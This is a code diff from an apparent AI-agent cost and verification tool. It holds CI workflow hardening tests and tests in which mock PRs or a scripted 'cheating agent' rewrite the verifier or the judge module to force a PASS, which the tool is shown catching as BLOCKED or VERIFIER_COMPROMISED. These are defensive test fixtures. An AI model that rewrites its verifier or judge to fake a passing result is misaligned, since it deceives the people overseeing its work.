const wfPath = path.join(REPO_ROOT, "examples", "runcap-adjudicate.yml");
|
|
283
|
+
const wfRaw = readFileSync(wfPath, "utf8");
|
|
284
|
+
// Assert on the effective YAML directives, not the explanatory comments. The
|
|
285
|
+
// header documents what the workflow must NOT do (and so legitimately contains
|
|
286
|
+
// strings like "pull_request_target"); strip comments so the safety checks see
|
|
287
|
+
// only the real instructions. Inline `# v4.3.1` after a SHA is stripped too,
|
|
288
|
+
// which is harmless because the SHA precedes the `#`.
|
|
289
|
+
const wfText = wfRaw.split("\n").map((line) => line.replace(/#.*$/, "")).join("\n");
|
|
290
|
+
check("reference workflow triggers on pull_request (not pull_request_target)",
|
|
291
|
+
/on:\s*\n\s*pull_request:/.test(wfText) && !/pull_request_target/.test(wfText), "trigger");
|
|
292
|
+
check("reference workflow grants only contents: read", /permissions:\s*\n\s*contents:\s*read/.test(wfText) && !/id-token/.test(wfText) && !/write/.test(wfText.replace(/contents:\s*read/g, "")), "permissions");
|
|
293
|
+
check("reference workflow caps runtime (timeout-minutes: 10)", /timeout-minutes:\s*10/.test(wfText));
|
|
294
|
+
check("reference workflow uses no `needs:` (self-sufficient required gate)", !/\n\s*needs:/.test(wfText));
|
|
295
|
+
|
|
296
|
+
// Proof-gate hardening: the judge must NOT be PR-workspace code.
|
|
297
|
+
check("reference workflow never executes PR-workspace `node ./bin/runcap.mjs`", !/node\s+\.\/bin\/runcap\.mjs/.test(wfText), "executes workspace code");
|
|
298
|
+
check("reference workflow never uses a local action (`uses: ./`)", !/uses:\s*\.\//.test(wfText), "local action");
|
|
299
|
+
check("reference workflow never runs `npm ci`/`npm install` of the PR manifest", !/npm\s+(ci|install)/.test(wfText), "PR-workspace install");
|
|
300
|
+
check("reference workflow sets persist-credentials: false (never true)", /persist-credentials:\s*false/.test(wfText) && !/persist-credentials:\s*true/.test(wfText), "persist-credentials");
|
|
301
|
+
// Every `uses:` must be pinned to a full 40-hex commit SHA, never a floating tag.
|
|
302
|
+
const usesRefs = [...wfText.matchAll(/uses:\s*([^\s#]+)/g)].map((m) => m[1]);
|
|
303
|
+
check("reference workflow pins every action by a full 40-char commit SHA (no @v4/@v1 tags)",
|
|
304
|
+
usesRefs.length > 0 && usesRefs.every((u) => /@[0-9a-f]{40}$/.test(u)), JSON.stringify(usesRefs));
|
|
305
|
+
check("reference workflow's judge is the released Runcap action, not workspace code",
|
|
306
|
+
/uses:\s*kirder24-code\/ai-agent-manager@[0-9a-f]{40}/.test(wfText) && /mode:\s*adjudicate/.test(wfText), "released action judge");
|
|
307
|
+
|
|
308
|
+
// --- 22. the judge is the adjudicator's OWN code, not the PR's bin -----------
|
|
309
|
+
// A head PR that rewrites bin/runcap.mjs to always print PASS, or rewrites
|
|
310
|
+
// src/adjudicate.mjs, cannot change the verdict, because the adjudicator we run
|
|
311
|
+
// is THIS repo's module/bin (the released-action analogue), never the head copy.
|
|
312
|
+
const HEAD_FAKE_BIN = makeHead("h-fake-bin", () => {
|
|
313
|
+
w("app/broken.mjs", "export const ok = false; // still broken\n");
|
|
314
|
+
mkdirSync(path.join(tmp, "bin"), { recursive: true });
|
|
315
|
+
w("bin/runcap.mjs", "#!/usr/bin/env node\nconsole.log('Verdict: PASS'); process.exit(0);\n");
|
|
316
|
+
});
|
|
317
|
+
const fakeBin = await adj(BASE, HEAD_FAKE_BIN);
|
|
318
|
+
check("head PR rewriting bin/runcap.mjs to fake PASS is still BLOCKED by the trusted adjudicator",
|
|
319
|
+
fakeBin.verdict === "BLOCKED", JSON.stringify(fakeBin.reasons));
|
|
320
|
+
// And via the REAL trusted bin (this repo's, analogue of the pinned released action):
|
|
321
|
+
const fakeBinReal = runBin(["--base", BASE, "--head", HEAD_FAKE_BIN]);
|
|
322
|
+
check("trusted `runcap ci --mode adjudicate` exits 1 on a fake-PASS head bin", fakeBinReal.code === 1, `code=${fakeBinReal.code}`);
|
|
323
|
+
|
|
324
|
+
const HEAD_FAKE_ADJ = makeHead("h-fake-adj", () => {
|
|
325
|
+
w("app/broken.mjs", "export const ok = false; // still broken\n");
|
|
326
|
+
mkdirSync(path.join(tmp, "src"), { recursive: true });
|
|
327
|
+
w("src/adjudicate.mjs", "export async function adjudicate(){return {verdict:'PASS',reasons:[]};}\nexport function exitCodeFor(){return 0;}\nexport function formatAdjudication(){return ['Verdict: PASS'];}\n");
|
|
328
|
+
});
|
|
329
|
+
const fakeAdj = await adj(BASE, HEAD_FAKE_ADJ);
|
|
330
|
+
check("head PR rewriting src/adjudicate.mjs is still BLOCKED (we never import the head copy)",
|
|
331
|
+
fakeAdj.verdict === "BLOCKED", JSON.stringify(fakeAdj.reasons));
|
|
332
|
+
|
|
333
|
+
console.log("\n" + (failures === 0 ? "ALL ADJUDICATE TESTS PASSED" : `${failures} ADJUDICATE TEST(S) FAILED`));
|
|
334
|
+
process.exit(failures === 0 ? 0 : 1);
|
|
@@ -0,0 +1,76 @@
|
|
|
1
|
+
// Proves `runcap outcome --guard` grades verification trust, not just pass/fail.
|
|
2
|
+
// Three real runs through the cap gateway (mock upstream) inside a throwaway git
|
|
3
|
+
// repo: an honest fix earns VERIFIED_STRONG; an agent that rewrites the verifier
|
|
4
|
+
// to force a green earns VERIFIER_COMPROMISED; a no-fix run stays UNVERIFIED.
|
|
5
|
+
// The whole point of the guard is that the middle case must NOT read as VERIFIED.
|
|
6
|
+
|
|
7
|
+
import os from "node:os";
|
|
8
|
+
import path from "node:path";
|
|
9
|
+
import { fileURLToPath } from "node:url";
|
|
10
|
+
import { execFileSync } from "node:child_process";
|
|
11
|
+
import { mkdtempSync, writeFileSync, mkdirSync } from "node:fs";
|
|
12
|
+
|
|
13
|
+
const SRC_DIR = process.env.RUNCAP_SRC ?? path.join(path.dirname(fileURLToPath(import.meta.url)), "..", "src");
|
|
14
|
+
|
|
15
|
+
const tmp = mkdtempSync(path.join(os.tmpdir(), "runcap-guard-"));
|
|
16
|
+
process.chdir(tmp);
|
|
17
|
+
|
|
18
|
+
mkdirSync(path.join(tmp, "app"), { recursive: true });
|
|
19
|
+
// broken.mjs starts wrong (ok=false), so the task genuinely fails on baseline.
|
|
20
|
+
writeFileSync(path.join(tmp, "app", "broken.mjs"), "export const ok = false;\n");
|
|
21
|
+
writeFileSync(path.join(tmp, "app", "verify.mjs"),
|
|
22
|
+
"import { ok } from './broken.mjs'; import assert from 'node:assert'; assert.strictEqual(ok, true, 'not fixed'); console.log('ok');\n");
|
|
23
|
+
|
|
24
|
+
// Honest agent: spends, then fixes the source file (an allowed change).
|
|
25
|
+
writeFileSync(path.join(tmp, "agent-fix.mjs"),
|
|
26
|
+
"const b=process.env.OPENAI_BASE_URL;await fetch(`${b}/chat/completions`,{method:'POST',headers:{'content-type':'application/json',authorization:'Bearer x'},body:JSON.stringify({model:'gpt-4o',messages:[{role:'user',content:'fix it'}]})}).then(r=>r.text());" +
|
|
27
|
+
"const {writeFile}=await import('node:fs/promises');await writeFile('app/broken.mjs','export const ok = true;\\n');\n");
|
|
28
|
+
// Cheating agent: instead of fixing the bug, it rewrites the VERIFIER so it always passes.
|
|
29
|
+
writeFileSync(path.join(tmp, "agent-cheat.mjs"),
|
|
30
|
+
"const b=process.env.OPENAI_BASE_URL;await fetch(`${b}/chat/completions`,{method:'POST',headers:{'content-type':'application/json',authorization:'Bearer x'},body:JSON.stringify({model:'gpt-4o',messages:[{role:'user',content:'cheat'}]})}).then(r=>r.text());" +
|
|
31
|
+
"const {writeFile}=await import('node:fs/promises');await writeFile('app/verify.mjs','console.log(\"ok\");\\n');\n");
|
|
32
|
+
// No-fix agent: spends, changes nothing.
|
|
33
|
+
writeFileSync(path.join(tmp, "agent-nop.mjs"),
|
|
34
|
+
"const b=process.env.OPENAI_BASE_URL;await fetch(`${b}/chat/completions`,{method:'POST',headers:{'content-type':'application/json',authorization:'Bearer x'},body:JSON.stringify({model:'gpt-4o',messages:[{role:'user',content:'think'}]})}).then(r=>r.text());console.log('no fix');\n");
|
|
35
|
+
|
|
36
|
+
// Commit a baseline so the guard has a real commit + clean tree to check against.
|
|
37
|
+
const g = (...a) => execFileSync("git", a, { cwd: tmp, stdio: "pipe" });
|
|
38
|
+
g("init", "-q");
|
|
39
|
+
g("config", "user.email", "test@runcap.local");
|
|
40
|
+
g("config", "user.name", "runcap-test");
|
|
41
|
+
g("add", "-A");
|
|
42
|
+
g("commit", "-qm", "baseline");
|
|
43
|
+
|
|
44
|
+
let failures = 0;
|
|
45
|
+
const check = (name, pass, detail) => { if (!pass) failures++; console.log(`${pass ? "PASS" : "FAIL"} ${name}${detail ? " — " + detail : ""}`); };
|
|
46
|
+
|
|
47
|
+
const { runOutcome } = await import(path.join(SRC_DIR, "mission-control.mjs"));
|
|
48
|
+
|
|
49
|
+
// Each scenario must start from the committed baseline - otherwise one run's
|
|
50
|
+
// edits (especially the cheat run's rewritten verifier) leak into the next.
|
|
51
|
+
const resetToBaseline = () => { g("checkout", "-f", "HEAD"); g("clean", "-fdq", "-e", ".runcap"); };
|
|
52
|
+
|
|
53
|
+
// 1. Honest fix, guarded → VERIFIED_STRONG.
|
|
54
|
+
const fix = await runOutcome({ task: "fix ok", verify: "node app/verify.mjs", command: ["node", "agent-fix.mjs"], label: "guard-fix", mock: true, guard: true, allow: ["app/broken.mjs"] });
|
|
55
|
+
check("honest fix verifies (exit-code oracle)", fix.receipt.outcome === "VERIFIED", `outcome=${fix.receipt.outcome}`);
|
|
56
|
+
check("honest fix grades VERIFIED_STRONG", fix.receipt.verificationIntegrity.status === "VERIFIED_STRONG", `status=${fix.receipt.verificationIntegrity.status}`);
|
|
57
|
+
check("strong run reproduced the baseline failure first", fix.receipt.verificationIntegrity.contract.baselineVerifyPassed === false);
|
|
58
|
+
check("strong pass survives a clean checkout", fix.receipt.verificationIntegrity.cleanRoom.passed === true, fix.receipt.verificationIntegrity.cleanRoom.detail);
|
|
59
|
+
|
|
60
|
+
// 2. Cheat by rewriting the verifier → still exit-0 "VERIFIED", but COMPROMISED.
|
|
61
|
+
resetToBaseline();
|
|
62
|
+
const cheat = await runOutcome({ task: "fix ok", verify: "node app/verify.mjs", command: ["node", "agent-cheat.mjs"], label: "guard-cheat", mock: true, guard: true, allow: ["app/broken.mjs"] });
|
|
63
|
+
check("cheat run's exit code is still 0 (the trap)", cheat.receipt.verify.passed === true);
|
|
64
|
+
check("guard catches the rewritten verifier", cheat.receipt.verificationIntegrity.status === "VERIFIER_COMPROMISED", `status=${cheat.receipt.verificationIntegrity.status}`);
|
|
65
|
+
check("compromised run names the tampered file", cheat.receipt.verificationIntegrity.violations.some((v) => v.startsWith("verifier_file_unchanged:")), JSON.stringify(cheat.receipt.verificationIntegrity.violations));
|
|
66
|
+
|
|
67
|
+
// 3. No-fix, guarded → UNVERIFIED (verify never passed).
|
|
68
|
+
resetToBaseline();
|
|
69
|
+
const nop = await runOutcome({ task: "fix ok", verify: "node app/verify.mjs", command: ["node", "agent-nop.mjs"], label: "guard-nop", mock: true, guard: true, allow: ["app/broken.mjs"] });
|
|
70
|
+
check("no-fix guarded run is UNVERIFIED", nop.receipt.verificationIntegrity.status === "UNVERIFIED", `status=${nop.receipt.verificationIntegrity.status}`);
|
|
71
|
+
|
|
72
|
+
// 4. The honesty note about cost scope rides on every guarded receipt.
|
|
73
|
+
check("receipt states cost scope is LLM-only", /subscriptions/.test(fix.receipt.costScope.note));
|
|
74
|
+
|
|
75
|
+
console.log("\n" + (failures === 0 ? "ALL GUARD TESTS PASSED" : `${failures} GUARD TEST(S) FAILED`));
|
|
76
|
+
process.exit(failures === 0 ? 0 : 1);
|
|
@@ -15,29 +15,29 @@ const C = {
|
|
|
15
15
|
};
|
|
16
16
|
|
|
17
17
|
const lines = [
|
|
18
|
-
{ t: "$ runcap
|
|
19
|
-
{ t: "
|
|
20
|
-
{ t: "
|
|
21
|
-
{ t: "", c: C.text, at: 1.5 },
|
|
22
|
-
{ t: "
|
|
23
|
-
{ t: "
|
|
24
|
-
{ t: "
|
|
25
|
-
{ t: "", c: C.
|
|
26
|
-
{ t: "
|
|
27
|
-
{ t: "
|
|
28
|
-
{ t: "", c: C.
|
|
29
|
-
{ t: "
|
|
30
|
-
{ t: "
|
|
31
|
-
{ t: "", c: C.
|
|
32
|
-
{ t: "
|
|
33
|
-
{ t: "
|
|
18
|
+
{ t: "$ runcap mission run --policy .runcap/mission.yaml -- claude \"fix the failing checkout test\"", c: C.prompt, at: 0.3 },
|
|
19
|
+
{ t: "Policy: checkout · team payments · cap $10 · verify \"npm test\"", c: C.dim, at: 0.9 },
|
|
20
|
+
{ t: "", c: C.text, at: 1.0 },
|
|
21
|
+
{ t: "→ estimate $3 - $7 · hard cap armed at $10", c: C.text, at: 1.5 },
|
|
22
|
+
{ t: "→ compressed 1,186 → 737 tokens on a real call (37.9% saved)", c: C.ok, at: 2.1 },
|
|
23
|
+
{ t: "", c: C.text, at: 2.2 },
|
|
24
|
+
{ t: "✓ verify passed - but did the agent earn it?", c: C.text, at: 2.9 },
|
|
25
|
+
{ t: " · verifier unchanged · baseline truly failed · clean-room replay reproduced", c: C.dim, at: 3.4 },
|
|
26
|
+
{ t: " Verification integrity: VERIFIED_STRONG", c: C.ok, at: 4.0 },
|
|
27
|
+
{ t: " Mission cost $0.0007 / $10.00 · 3 files changed, all in scope", c: C.text, at: 4.6 },
|
|
28
|
+
{ t: " Mission verdict: PASS", c: C.accent, at: 5.2 },
|
|
29
|
+
{ t: "", c: C.text, at: 5.3 },
|
|
30
|
+
{ t: "$ runcap ci --policy .runcap/mission.yaml # the same gate, on the PR", c: C.prompt, at: 6.2 },
|
|
31
|
+
{ t: "✗ agent rewrote app/verify.mjs - protected evidence changed", c: C.bad, at: 6.9 },
|
|
32
|
+
{ t: " Verification integrity: VERIFIER_COMPROMISED", c: C.bad, at: 7.5 },
|
|
33
|
+
{ t: " Mission verdict: BLOCKED → PR check fails, run stopped", c: C.bad, at: 8.1 }
|
|
34
34
|
];
|
|
35
35
|
|
|
36
|
-
const W =
|
|
36
|
+
const W = 980, H = 588;
|
|
37
37
|
const padX = 28, top = 78, lh = 27, fs = 16.5;
|
|
38
38
|
const esc = (s) => s.replace(/&/g, "&").replace(/</g, "<").replace(/>/g, ">");
|
|
39
39
|
|
|
40
|
-
const total =
|
|
40
|
+
const total = 11.0; // loop length seconds
|
|
41
41
|
const rows = lines.map((ln, i) => {
|
|
42
42
|
const y = top + i * lh;
|
|
43
43
|
// fade+slide in at ln.at, hold, then reset at end of loop
|
|
@@ -47,7 +47,7 @@ const rows = lines.map((ln, i) => {
|
|
|
47
47
|
${esc(ln.t)}</text>`;
|
|
48
48
|
}).join("\n");
|
|
49
49
|
|
|
50
|
-
const svg = `<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 ${W} ${H}" width="${W}" height="${H}" role="img" aria-label="Runcap terminal demo:
|
|
50
|
+
const svg = `<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 ${W} ${H}" width="${W}" height="${H}" role="img" aria-label="Runcap terminal demo: estimate, cap, verify integrity, mission PASS, then a tampered run graded BLOCKED on the PR">
|
|
51
51
|
<defs>
|
|
52
52
|
<linearGradient id="brand" x1="0" y1="0" x2="1" y2="0">
|
|
53
53
|
<stop offset="0" stop-color="#22d3ee"/><stop offset="1" stop-color="#34d399"/>
|
|
@@ -65,7 +65,7 @@ const svg = `<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 ${W} ${H}" wid
|
|
|
65
65
|
<circle cx="26" cy="28" r="6" fill="#f87171"/>
|
|
66
66
|
<circle cx="48" cy="28" r="6" fill="#fbbf24"/>
|
|
67
67
|
<circle cx="70" cy="28" r="6" fill="#34d399"/>
|
|
68
|
-
<text x="100" y="33" fill="#8a8a8a" font-family="'JetBrains Mono',monospace" font-size="14">runcap · estimate · cap ·
|
|
68
|
+
<text x="100" y="33" fill="#8a8a8a" font-family="'JetBrains Mono',monospace" font-size="14">runcap · estimate · cap · verify integrity · mission verdict</text>
|
|
69
69
|
<text x="${W-150}" y="33" fill="url(#brand)" font-family="'JetBrains Mono',monospace" font-weight="700" font-size="15">run·cap</text>
|
|
70
70
|
</g>
|
|
71
71
|
<line x1="0" y1="50" x2="${W}" y2="50" stroke="#1c1c1f"/>
|